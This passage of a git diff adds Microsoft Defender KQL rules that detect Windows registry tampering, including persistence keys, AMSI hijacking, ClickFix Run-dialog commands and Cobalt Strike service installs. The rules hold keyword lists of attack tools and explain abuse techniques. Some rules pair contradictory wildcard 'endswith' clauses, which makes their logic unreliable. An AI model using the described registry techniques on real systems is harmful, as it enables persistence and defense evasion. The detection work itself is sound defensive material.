+// Description: Detects changes to the registry values related to outlook security settings
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+//   - Administrative activity
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql
new file mode 100644
index 00000000..626c2a50
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql
@@ -0,0 +1,13 @@
+// Title: Periodic Backup For System Registry Hives Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-01
+// Level: medium
+// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
+// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+//   - Legitimate need for RegBack feature by administrators.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql
new file mode 100644
index 00000000..ea9b0f14
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql
@@ -0,0 +1,15 @@
+// Title: Persistence Via Disk Cleanup Handler - Autorun
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
+// The disk cleanup manager is part of the operating system.
+// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql b/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql
new file mode 100644
index 00000000..5aadd689
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Hhctrl.ocx
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql b/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql
new file mode 100644
index 00000000..9d4e9561
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via New SIP Provider
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003
+// False Positives:
+//   - Legitimate SIP being registered by the OS or different software.
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql
new file mode 100644
index 00000000..b848e165
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential AMSI COM Server Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: high
+// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql
new file mode 100644
index 00000000..e9eb483b
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql
@@ -0,0 +1,12 @@
+// Title: Potential Attachment Manager Settings Associations Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql
new file mode 100644
index 00000000..97a36539
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql
@@ -0,0 +1,12 @@
+// Title: Potential Attachment Manager Settings Attachments Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql
new file mode 100644
index 00000000..2a25463c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential AutoLogger Sessions Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\System\\CurrentControlSet\\Control\\WMI\\Autologger*" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\") and (RegistryKey endswith "\\DefenderApiLogger*" or RegistryKey endswith "\\DefenderAuditLogger*")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql
new file mode 100644
index 00000000..6c856384
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_clickfix_execution_pattern_registry.kql
@@ -0,0 +1,15 @@
+// Title: Potential ClickFix Execution Pattern - Registry
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-03-25
+// Level: high
+// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
+// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
+// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
+// such as one-liners that execute remotely hosted malicious files or scripts.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.001
+// False Positives:
+//   - Legitimate applications using RunMRU with HTTP links
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql
new file mode 100644
index 00000000..6a2951a5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_cobaltstrike_service_installations_registry.kql
@@ -0,0 +1,12 @@
+// Title: Potential CobaltStrike Service Installations - Registry
+// Author: Wojciech Lesicki
+// Date: 2021-06-29
+// Level: high
+// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql
new file mode 100644
index 00000000..6f67d5b6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_com_object_hijacking_via_treatas_subkey_registry.kql
@@ -0,0 +1,12 @@
+// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry
+// Author: Kutepov Anton, oscd.community
+// Date: 2019-10-23
+// Level: medium
+// Description: Detects COM object hijacking via TreatAs subkey
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+//   - Maybe some system utilities in rare cases use linking keys for backward compatibility
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs") and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
new file mode 100644
index 00000000..c5d6b1af
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+//   - Other legitimate network providers used and not filtred in this rule
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\System\\CurrentControlSet\\Services*" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql
new file mode 100644
index 00000000..451f6f29
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_eventlog_file_location_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential EventLog File Location Tampering
+// Author: D3F7A5105
+// Date: 2023-01-02
+// Level: high
+// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql
new file mode 100644
index 00000000..4566be91
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_pendingfilerenameoperations_tampering.kql
@@ -0,0 +1,12 @@
+// Title: Potential PendingFileRenameOperations Tampering
+// Author: frack113
+// Date: 2023-01-27
+// Level: medium
+// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+//   - Installers and updaters may set currently in use files for rename or deletion after a reboot.
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations" and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or InitiatingProcessFolderPath contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql
new file mode 100644
index 00000000..db9f023f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_using_debugpath.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Using DebugPath
+// Author: frack113
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects potential persistence using Appx DebugPath
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql
new file mode 100644
index 00000000..f8a9409c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_app_paths_default_property.kql
@@ -0,0 +1,15 @@
+// Title: Potential Persistence Via App Paths Default Property
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
+// The entries found under App Paths are used primarily for the following purposes.
+// First, to map an application's executable file name to that file's fully qualified path.
+// Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012
+// False Positives:
+//   - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql
new file mode 100644
index 00000000..6a009776
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_appcompat_registerapprestart_layer.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-01
+// Level: medium
+// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
+// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
+// This can be potentially abused as a persistence mechanism.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+//   - Legitimate applications making use of this feature for compatibility reasons
+
+DeviceRegistryEvents
+| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql
new file mode 100644
index 00000000..fb66964c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_autodialdll.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via AutodialDLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql
new file mode 100644
index 00000000..c84b186a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_chm_helper_dll.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via CHM Helper DLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql
new file mode 100644
index 00000000..9b799adf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_custom_protocol_handler.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Custom Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-30
+// Level: medium
+// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.
+
+DeviceRegistryEvents
+| where (RegistryValueData startswith "URL:" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql
new file mode 100644
index 00000000..47c8c3f1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_dllpathoverride.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via DLLPathOverride
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language*" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql
new file mode 100644
index 00000000..05844b1f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_event_viewer_events_asp.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Event Viewer Events.asp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-17
+// Level: medium
+// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql
new file mode 100644
index 00000000..c76d6bf9
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_excel_add_in_registry.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Excel Add-in - Registry
+// Author: frack113
+// Date: 2023-01-15
+// Level: high
+// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Options"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql
new file mode 100644
index 00000000..eda54125
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_globalflags.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via GlobalFlags
+// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
+// Date: 2018-04-11
+// Level: high
+// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\Image File Execution Options*" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\SilentProcessExit*"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql
new file mode 100644
index 00000000..8f2365a3
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_logon_scripts_registry.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Logon Scripts - Registry
+// Author: Tom Ueltschi (@c_APT_ure)
